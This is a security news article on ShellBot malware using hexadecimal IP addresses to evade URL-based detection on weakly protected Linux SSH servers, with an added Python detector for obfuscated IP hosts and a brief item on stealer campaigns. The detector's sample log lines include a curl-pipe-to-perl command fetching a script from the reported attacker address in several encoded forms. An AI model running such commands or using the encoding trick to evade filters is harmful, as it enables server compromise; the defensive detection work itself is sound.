The ShellBot malware operators have recently begun writing their IP addresses in hexadecimal to avoid detection in their attacks on poorly configured Linux SSH servers.
The group behind ShellBot used these hexadecimal IPs while breaching vulnerable Linux SSH servers and deploying distributed denial-of-service malware. Based on reports, the standard operation of ShellBot is unchanged; what has changed is the download URL the threat actor uses to install ShellBot, which now contains a hexadecimal value instead of a regular dotted-decimal IP address.
ShellBot, also known as PerlBot, is a notorious threat group known for breaching servers with weak SSH credentials through brute-force or dictionary attacks. Once it obtains initial access, the botnet becomes a vector for launching DDoS attacks and delivering cryptocurrency miners. The botnet itself is written in Perl and can use the IRC protocol to communicate with its command-and-control (C2) server.
The new ShellBot malware campaigns include hexadecimal IP addresses.
According to investigations, the newly discovered ShellBot malware attacks involve the installation of the malware via hexadecimal IP addresses, such as “hxxp://0x2763da4e/,” which corresponds to “39.99.218[.]78.”
Researchers believe this change is the malware operators’ attempt to bypass detection signatures based on URL patterns. The researchers also emphasised that the threat actors download the payload with “curl”, which, like web browsers, accepts hexadecimal IP addresses in URLs. This technique allowed ShellBot to infiltrate Linux systems and run successfully via Perl.
This discovery shows that ShellBot’s developers continue to actively use it in attacks against Linux systems. Users should therefore strengthen their server security by using strong passwords and changing them regularly to resist brute-force and dictionary attacks.
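The evasion described above works because curl and browsers resolve a numeric host using inet_aton-style rules (hexadecimal, octal, plain decimal and shortened forms), while a signature that only matches dotted-decimal IPs never sees “39.99.218.78” in “hxxp://0x2763da4e/”. The following added example, which is not code from the report or from the ShellBot authors, normalises every numeric IPv4 host form to its dotted-decimal value and flags download URLs whose host is not already dotted-decimal. It goes beyond the hexadecimal case in the article to the decimal, octal and mixed forms that the same parsers accept; the log lines are constructed, and the URL regex and function names are assumptions for this example.

```python
import re
from urllib.parse import urlsplit

# Matches both live and defanged (hxxp) scheme prefixes found in logs and reports.
URL_RE = re.compile(r"\b(?:https?|hxxps?)://[^\s\"'<>]+")


def _parse_part(part):
    """Parse one dotted component the way inet_aton does: 0x.. hex, 0.. octal, else decimal."""
    if part[:2].lower() == "0x":
        return int(part[2:], 16)          # raises ValueError on "0x" alone
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def normalize_host(host):
    """Return the dotted-decimal IPv4 address for a numeric host, or None if it is not one.

    Accepts 1 to 4 dot-separated parts; every part except the last is one byte and the
    last part fills the remaining bytes (so "0x2763da4e", "660855374" and
    "0x27.99.0xda4e" all denote 39.99.218.78).
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or any(p == "" for p in parts):
        return None
    try:
        values = [_parse_part(p) for p in parts]
    except ValueError:
        return None                        # a hostname such as example.com
    leading, last = values[:-1], values[-1]
    if any(not 0 <= v <= 255 for v in leading):
        return None
    remaining_bytes = 4 - len(leading)
    if not 0 <= last < (1 << (8 * remaining_bytes)):
        return None
    n = 0
    for v in leading:
        n = (n << 8) | v
    n = (n << (8 * remaining_bytes)) | last
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def classify_host(host):
    """Return (dotted_quad, is_obfuscated); (None, False) when the host is not a numeric IPv4."""
    dotted = normalize_host(host)
    if dotted is None:
        return None, False
    return dotted, host != dotted          # any non-canonical spelling counts as obfuscated


def flag_obfuscated_ip_urls(lines):
    """Scan log lines for URLs whose host is an IPv4 address written in a non-dotted-decimal form."""
    hits = []
    for line in lines:
        for url in URL_RE.findall(line):
            host = urlsplit(url).hostname  # strips port, lowercases
            if not host:
                continue
            dotted, obfuscated = classify_host(host)
            if obfuscated:
                hits.append((host, dotted))
    return hits


# Constructed sample log lines; only the first uses the hexadecimal form seen in the report,
# the others show decimal and per-octet hex spellings that the same downloaders accept.
SAMPLE_LINES = [
    "sh -c 'curl -fsSL http://0x2763da4e/install.sh | perl'",
    "wget http://39.99.218.78/install.sh",
    "curl http://660855374/install.sh",
    "curl http://0x27.0x63.0xda.0x4e/install.sh",
    "curl https://example.com/install.sh",
]

if __name__ == "__main__":
    for host, dotted in flag_obfuscated_ip_urls(SAMPLE_LINES):
        print(f"obfuscated host {host!r} -> {dotted}")
```

Because the check compares the decoded address with the literal host string, it is the normalised address (not the spelling) that should feed blocklists and correlation rules; the spelling itself is a useful detection signal, since legitimate software rarely fetches from a hexadecimal or bare-integer host.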
Separately, another threat involves attackers using abnormal certificates with exceptionally long strings in the Subject Name and Issuer Name fields. The attackers used this tactic to distribute information-stealing malware such as Lumma Stealer and a RedLine Stealer variant known as RecordBreaker.
The malicious pages distributing these files are easily reachable through search engines, typically under keywords associated with illegal programs such as serials, keygens and cracks, which puts many users at risk. Users should be wary of these techniques and careful when downloading software from unverified websites.